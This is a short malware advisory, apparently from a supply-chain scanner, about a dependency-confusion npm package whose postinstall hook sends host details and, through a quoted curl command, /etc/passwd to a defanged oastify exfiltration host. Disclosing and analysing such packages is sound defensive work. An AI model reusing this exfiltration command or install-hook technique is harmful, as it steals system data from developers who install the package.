LWA-2026-1226 MAL-2026-5429 ↗ confirmed malware

@shell-landing/routes@99.9.5

Malicious code in @shell-landing/routes (npm)

T1195.002 · Compromise Software Supply Chain

Analysis

Dependency-confusion stub: @shell-landing/routes is a 590-byte tarball at sentinel version 99.9.5 with no prior versions, README, or repo. The postinstall hook exfiltrates system data: (1) node scripts/scream3gg.js hex-encodes the hostname, homedir, and username and sends them via fetch to an oastify[.]com subdomain; (2) /usr/bin/curl --data '@/etc/passwd' $(hostname).<subdomain>.oastify[.]com leaks /etc/passwd per machine. oastify[.]com is an OOB interaction endpoint used here as a C2 exfil receiver.

analyzed by
Leitwacht
first seen
May 29, 2026, 03:31 PM
analyzed
May 29, 2026, 09:43 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.